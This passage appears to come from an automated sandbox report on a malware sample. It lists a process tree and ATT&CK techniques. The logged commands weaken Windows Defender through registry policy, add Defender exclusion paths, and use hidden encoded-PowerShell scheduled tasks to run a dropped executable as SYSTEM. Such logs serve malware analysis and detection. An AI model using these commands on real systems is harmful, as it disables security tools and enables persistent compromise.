    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3320
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3808
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2308
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:404
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4100
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ALRwEzuWrAsGeancnQR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ALRwEzuWrAsGeancnQR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WNIbsgFKIwYHC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WNIbsgFKIwYHC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cbczIfqtTLGU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cbczIfqtTLGU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fknBbmiwHlUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fknBbmiwHlUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wpdVyoDUU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wpdVyoDUU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VwCbummLueQufHVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VwCbummLueQufHVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YdAIlVMUmInzfjlkV\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\YdAIlVMUmInzfjlkV\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\KnYAlcqqbQnCryhK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\KnYAlcqqbQnCryhK\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:3140
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ALRwEzuWrAsGeancnQR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1944
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ALRwEzuWrAsGeancnQR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ALRwEzuWrAsGeancnQR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cbczIfqtTLGU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cbczIfqtTLGU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1084
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fknBbmiwHlUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YdAIlVMUmInzfjlkV /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\KnYAlcqqbQnCryhK /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\KnYAlcqqbQnCryhK /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\YdAIlVMUmInzfjlkV /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4844
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VwCbummLueQufHVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VwCbummLueQufHVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wpdVyoDUU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4972
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wpdVyoDUU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fknBbmiwHlUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNIbsgFKIwYHC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNIbsgFKIwYHC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:404
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ggPTOAalB" /SC once /ST 18:33:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:2384
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "ggPTOAalB"
  2⤵
  PID:3804
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ggPTOAalB"
  2⤵
  PID:3744
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "HMkJLcwZhLyuAVbVM" /SC once /ST 18:33:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\KnYAlcqqbQnCryhK\QhIrPWmxERbWNZe\xWehayK.exe\" ao /site_id 525403 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:4352
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "HMkJLcwZhLyuAVbVM"
  2⤵
  PID:2932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4000 -ip 4000
1⤵
PID:2900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4404 -ip 4404
1⤵
PID:1396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4392 -ip 4392
1⤵
PID:3176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1808

C:\Windows\Temp\KnYAlcqqbQnCryhK\QhIrPWmxERbWNZe\xWehayK.exe
C:\Windows\Temp\KnYAlcqqbQnCryhK\QhIrPWmxERbWNZe\xWehayK.exe ao /site_id 525403 /S
1⤵
PID:1740
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bfqaWfIvSxIbjvrIXL"
  2⤵
  PID:3692

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Bootkit

T1067

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Process Discovery

T1057

Query Registry

System Information Discovery